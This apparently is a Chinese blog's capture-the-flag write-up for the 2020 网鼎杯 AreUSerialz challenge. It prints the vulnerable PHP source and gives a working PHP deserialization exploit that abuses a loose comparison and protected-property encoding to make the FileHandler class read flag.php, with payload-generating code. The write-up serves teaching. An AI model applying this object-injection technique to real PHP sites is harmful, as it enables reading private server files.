[网鼎杯 2020 青龙组]AreUSerialz

[网鼎杯 2020 青龙组]AreUSerialz

1.将源代码放到本地php环境中进行调试

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

2.解题思路

1.通过GET方式进行传参,传给变量str;
2.通过is_valid()函数判断进来的数据大于等于32并且小于等于125;
3.通过反序列化将str的字符串转换成对象。 我们想成功读取文件flag.php的话,需要判断以下条件 (1)我们在写保护的函数中,需要满足的条件是变量content不能大于100; (2)要想触发写保护的话,需要满足的条件是public
function process() 中的op == “1”; (3)要想到写保护的话,需要触发__construct函数
(4)__construfct函数,构造函数,当创建对象时自动调用

4.根据上述代码分析,当$op值强比较=\==不等于str(2),弱比较==等于2
(\$this->op === "2")//不等于字符串类型的 2
(\$this->op == "2") //弱等于2 即可为int(2)

3.所以触发__destruct()方法也没关系,正常构造即可

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op = '1';    //这里有问题,后面会讲述到
    protected $filename = 'flag.php';


    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }


    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

$test = new FileHandler;
var_dump(urlencode(serialize($test)));

4.通过URL解码,我们发现了在属性opfilename前面有乱码
在这里插入图片描述
5.使用十六进制进行和查看,可以看到%00%2A%00,因为opfilenameprotected的属性,
在序列化的过程中会被转换成%00*%00,然而浏览器会将%00当成空值,因此无法获得flag

在这里插入图片描述
6.我还以为抓包就能绕过这题,但是思路错了,使用bp或者yakit进行传参后面发现这种方法不得行
在这里插入图片描述
在这里插入图片描述
7.只能利用php7的版本对属性的不敏感绕过,需要纠正前面payload的错,op的应该是整型,及int()的类型,正确的payload如下所示

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    public  $op = 2;
    public $filename = 'flag.php';





}




$test = new FileHandler;
//var_dump(serialize($test));
var_dump(serialize($test));

在这里插入图片描述

在这里插入图片描述

8.查看源代码,即可获得flag
在这里插入图片描述

在这里插入图片描述

相关推荐

  1. 【web | CTF】BUUCTF [ 2020 ]AreUSerialz

    2024-04-22 14:52:05       49 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-22 14:52:05       70 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-22 14:52:05       74 阅读
  3. 在Django里面运行非项目文件

    2024-04-22 14:52:05       61 阅读
  4. Python语言-面向对象

    2024-04-22 14:52:05       71 阅读

热门阅读

  1. SQL Server详细使用教程

    2024-04-22 14:52:05       35 阅读
  2. js实现快速拖拽(定时器版本)

    2024-04-22 14:52:05       32 阅读
  3. Flink CDC 整库 / 多表同步至 Kafka 方案(附源码)

    2024-04-22 14:52:05       31 阅读
  4. 从事数据分析相关工作技术总结

    2024-04-22 14:52:05       26 阅读
  5. FFT快速傅里叶变换音频分析

    2024-04-22 14:52:05       38 阅读
  6. 基于单片机雨天自动关窗器的设计

    2024-04-22 14:52:05       33 阅读
  7. 基础矩阵和本质矩阵

    2024-04-22 14:52:05       38 阅读
  8. 水气表CJ/T188协议学习及实例

    2024-04-22 14:52:05       29 阅读
  9. 基于springboot的教学资源库源码数据库

    2024-04-22 14:52:05       31 阅读
  10. flink mysql数据表同步SQL CDC

    2024-04-22 14:52:05       34 阅读
  11. 【QT进阶】Qt http编程之json解析的简单介绍

    2024-04-22 14:52:05       39 阅读
  12. 从0开始深入理解Spring(1)--SpringApplication构造

    2024-04-22 14:52:05       32 阅读